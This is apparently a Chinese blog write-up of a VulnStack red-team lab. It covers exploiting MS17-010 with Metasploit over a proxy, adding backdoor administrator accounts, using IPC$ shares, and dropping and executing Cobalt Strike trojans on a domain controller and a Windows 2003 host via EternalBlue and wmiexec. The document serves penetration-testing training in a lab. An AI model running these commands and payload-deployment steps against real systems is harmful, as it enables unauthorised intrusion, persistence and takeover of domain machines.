VulnStack-01 ATT&CK红队评估(三)

简介: VulnStack-01 ATT&CK红队评估

2)永恒之蓝+wmiexec上线CS

(1)建立中转监听

1f24dc69a8f983671da40233ef4ca5bb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210817005034203

(2)生成32位和64位的木马

64.exe和32.exe

bfdbca3fed1136aac5e1c91b00b996e6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210819004815677

ca23029309f649af1893eceb9aed06de_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210819004824797

(3)msfconsole设置代理

setg Proxies socks5:10.0.1.12:11668
setg ReverseAllowProxy true

18ff4e9d60d209b2d2b400bf8de7d985_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818220154657

(4)使用ms17-010模块进行攻击

msf6 > search ms17-010
msf6 > use 0

4c81da4bc5352899937758c2272c1095_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818220254292

msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND ipconfig
COMMAND => ipconfig
msf6 auxiliary(admin/smb/ms17_010_command) > run

870e8355a2964f264c7b2b35c06a6f98_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818220502516

创建管理员组用户

net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add
net user ch4nge

4d9c17e5feabd8c755ea77114d0720ad_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818233503646

7b45699c49b29c298a67ab1d28b5b0cb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818233539854

74ec72242aaab890e5c2a140586e0919_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818233610709

(5)192.168.52.141建立管理员组用户

net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add
net user ch4nge

685ec6941f5950250b18a806eabd0efb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818234502256

6fa5b43b3b1d8443abef2dea7618e587_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818234548125

fc81401839705cb9ad762c518d6cda8d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818234638222

(6)建立IPC

然后使用CS的会话建立IPC

net use \\192.168.52.138\ipc$ "QWEasd123" /user:ch4nge
net use \\192.168.52.141\ipc$ "QWEasd123" /user:ch4nge
删除IPC方法
net use \\192.168.52.141 /del /y

f5dcb54923132029b10a9dde5238b2ae_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818234838829

192.168.52.141建立IPC成功,但是不能使用dir列C盘目录,使用域管理员用户才有权限,好家伙,先上线域控再说

copy马过去,永恒之蓝去执行.永恒之蓝执行命令的当前路径是C:\windows\system32\

直接copy到这个路径

copy 64.exe \\192.168.52.138\c$\windows\system32\

802d47effe23817e763b65d56613f74a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210819001353398

执行木马,上线CS

msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.52.138
rhosts => 192.168.52.138
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 64.exe
COMMAND => 64.exe
msf6 auxiliary(admin/smb/ms17_010_command) > run

ac1d7301347a658f71eeb0c74e0550ca_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210819001515464

(7)通过隧道使用wmiexec连接获取shell

windows版本的wmiexec好用

当然啦,域控也可以这样上线

wmiexec.exe ch4nge:QWEasd123@192.168.52.141
put 32.exe

60592ae102b6bd40037401ed6b1eae4b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210819004521782

注意192.168.52.141是win2003,是32位系统,木马要生成32位的

38d4b0cda3430ab2b3df47ab0b941a4e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210819004556704

6f10e37bfdbbd279ccbf18d96e688928_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210819005346701

总结

在打此靶场遇到一些问题总结如下

1.靶机中的域信任关系,域控可以直接dir 该域普通用户

2.域普通用户A对域普通用户B进行IPC的时候,要用B的域管理员用户才可以,本地管理员用户不可以;wmiexec使用B的本地用户和域管理员用户都可以连接

3.用wmiexec连接已知密码的靶机

相关文章
|
安全 数据安全/隐私保护
简单讲解一下什么是ATT&CK框架
简单讲解一下什么是ATT&CK框架
403 1
|
安全 Shell 网络安全
VulnStack-01 ATT&CK红队评估(二)
VulnStack-01 ATT&CK红队评估
253 0
VulnStack-01 ATT&CK红队评估(二)
|
NoSQL 关系型数据库 MySQL
VulnStack-01 ATT&CK红队评估(一)
VulnStack-01 ATT&CK红队评估
170 0
VulnStack-01 ATT&CK红队评估(一)
|
数据库
ATT&CK框架结构之侦察
ATT&CK框架结构侦察
156 0
ATT&CK框架结构之侦察
|
传感器 存储 数据可视化
什么是ATT&CK
什么是ATT&CK
343 0
什么是ATT&CK
|
安全 测试技术 网络安全
ATT&CK 威胁情报
ATT&CK 威胁情报
162 0
ATT&CK 威胁情报
|
安全 测试技术 Linux
ATT&CK初步了解
ATT&CK初步了解
473 0
ATT&CK初步了解
|
测试技术 网络安全
网络安全渗透测试的基本框架ATT&CK框架
网络安全渗透测试的基本框架ATT&CK框架
319 0
|
3月前
|
存储 关系型数据库 数据库
【DDIA笔记】【ch2】 数据模型和查询语言 -- 多对一和多对多
【6月更文挑战第7天】该文探讨数据模型,比较了“多对一”和“多对多”关系。通过使用ID而不是纯文本(如region_id代替"Greater Seattle Area"),可以实现统一、避免歧义、简化修改、支持本地化及优化搜索。在数据库设计中,需权衡冗余和范式。文档型数据库适合一对多但处理多对多复杂,若无Join,需应用程序处理。关系型数据库则通过外键和JOIN处理这些关系。文章还提及文档模型与70年代层次模型的相似性,层次模型以树形结构限制了多对多关系处理。为克服层次模型局限,发展出了关系模型和网状模型。
47 6
|
3月前
|
XML NoSQL 数据库
【DDIA笔记】【ch2】 数据模型和查询语言 -- 概念 + 数据模型
【6月更文挑战第5天】本文探讨了数据模型的分析,关注点包括数据元素、关系及不同类型的模型(关系、文档、图)与Schema模式。查询语言的考量涉及与数据模型的关联及声明式与命令式编程。数据模型从应用开发者到硬件工程师的各抽象层次中起着简化复杂性的关键作用,理想模型应具备简洁直观和可组合性。
30 2